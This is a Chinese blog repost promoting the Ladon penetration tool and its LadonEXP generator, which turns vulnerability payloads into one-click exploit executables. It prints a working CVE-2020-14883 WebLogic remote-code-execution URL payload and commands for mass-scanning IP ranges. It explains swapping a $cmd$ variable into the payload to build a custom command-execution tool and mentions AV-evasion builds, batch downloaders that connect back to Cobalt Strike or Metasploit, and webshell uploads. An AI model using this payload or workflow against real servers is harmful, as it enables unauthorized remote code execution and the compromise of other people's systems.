LadonEXP可自定义变量,一键武器化

admin 2023年3月9日12:21:32评论64 views字数 3162阅读10分32秒阅读模式

Ladon简介:
Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.9版本内置200个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMPNBTDNSMACSMBWMISSHHTTPHTTPSExchangemssqlFTPRDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotatoBadPotatoEfsPotatoBypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

版本说明:

Ladon911        完整功能版,体积大,易被杀,可本地测试、研究学习复现旧漏洞Ladon            10.8版本起Ladon.exe默认在Win11或装有.NET 4.8下使用效果最佳Ladon40            Win10或装有.NET 4.0或以上系统下使用 安装有4.8建议优先LadonLadon35            Win7/2008或装有.NET 3.x系统下使用 安装有4.8的建议优先LadonLadon.ps1        Win7-Win2022或装有PowerShell系统,可远程内存加载无文件渗透NimLadon        Nim免杀Ladon,可过部分杀软,可用net2nim工具 自行转换
script目录 CS插件,一键使用,内存加载,无需将EXE上传目标,无文件渗透 LadonGUI 辅助工具,含免杀、文本处理、加密解密、反弹Shell、子域名等LadonEXP EXP生成器,一键生成Poc、EXP,快速扩展Ladon批量GetShell能力LadonStudy 学习模式,一键渗透,对Ladon不熟的人,也可快速实战GetShellChatLadon 渗透机器人,也可当成学习模式,只要会聊天,就能让Ladon干活

Ladon 10.9 20230305

[-]SmbGhost      仅911版保留  SMB漏洞 永恒之黑[-]VsFtpDoor    仅911版保留 漏洞太老 概率低[u]Ladon Study    新增小图标 界面直观 便于区分 一眼找到常用功能[u]LadonGUI      修复RevShell生成Ladon PowerShell反弹命令错误的Bug[u]JoomlaPwd    域名解析IP TAB分隔 IP 用户 密码 方便MysqlScan检测[u]WhatCMSWebLogic 14.1.1.0.0WebLogic 12.2.1.4.0WebLogic 12.2.1.3.0WebLogic 12.2WebLogic 10.3.6.0WebLogic 10.3WebLogicWebLogic[maybe]
Ladon 10.9 20230302[u]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$[u]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求[u]WebLogicPoc CVE-2020-14883高危漏洞检测可识别出Windows或Linux[-]PortTran CS版移除 端口转发工具[u]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)[-]Help 仅911版保留 功能很多 建议看Wiki或Ladon Study[-]SMBGhost 仅CS和911版保留 Win10默认自动更新,实战遇到概率低[-]vsFTPdPoc 仅CS和911版保留 2011漏洞过旧,实战遇到概率低[-]CVE-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低[-]PhpStudyPoc 仅CS和911版保留


WebLogic漏洞复现例子  CVE-2020-14883

影响版本:10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

POC:

http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");

稍微改一下,通过LadonEXP可快速生成高效批量检测POC,当然大家也可以构造成批量执行下载者,自动上线CS或MSF等。

LadonEXP可自定义变量,一键武器化

PS:  双击文本框可展开或收缩,查看payload

Ladon内置WebLogicPoc模块包含多个漏洞POC,使用以下命令可轻松检测

Ladon 192.168.1.8 WeblogicPoc  扫IP默认7001 7002端口Ladon 192.168.1.8/24 WeblogicPoc 扫C段默认7001 7002端口Ladon 192.168.1.8:8088 WeblogicPoc 指定IP端口Ladon http://192.168.1.8:7003 WeblogicPoc 指定URLLadon ip.txt WeblogicPoc   批量IPLadon ip24.txt WeblogicPoc 批量C段Ladon url.txt WeblogicPoc  批量URL

使用该模块检测到不少站点还存在两三年前的漏洞,如CVE-2020-14883

LadonEXP可自定义变量,一键武器化

命令执行

检测 到漏洞后,我们可以使用Burp发包执行命令,但是这样很麻烦,执行一次命令,就得改一下payload,提交过程中要是不小心按到怎么按键,多了一个字符进去,如果执行一些长命令,本身命令还需要转义。执行命令的时候报错了,不知道究竟是命令错还是payload错,就因为一两字符错浪费时间。

LadonEXP可自定义变量,一键武器化

可以将payload中的whoami命令替换成$cmd$变量,然后生成EXE,这样就可以生成一个可执行自定义命令的漏洞工具,无需每次都手动修改然后再发包,原本需要复杂的反序列化payload,瞬间变成了简单的cmd命令执行。整个过程无需编程基础,轻轻松松就制作属于自己的EXP工具。

LadonEXP可自定义变量,一键武器化

PS: 由于是漏洞执行命令,有些漏洞可能有部份命令不可执行,遇到这种情况,可以上传相关WebShell控守,而且漏洞也可能会补,所以漏洞不能当作长期执行命令工具。

ChatLadon 说人话自动渗透

LadonEXP可自定义变量,一键武器化


LadonEXP可自定义变量,一键武器化


原文始发于微信公众号(K8实验室):LadonEXP可自定义变量,一键武器化

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月9日12:21:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   LadonEXP可自定义变量,一键武器化https://cn-sec.com/archives/1592914.html

发表评论

匿名网友 填写信息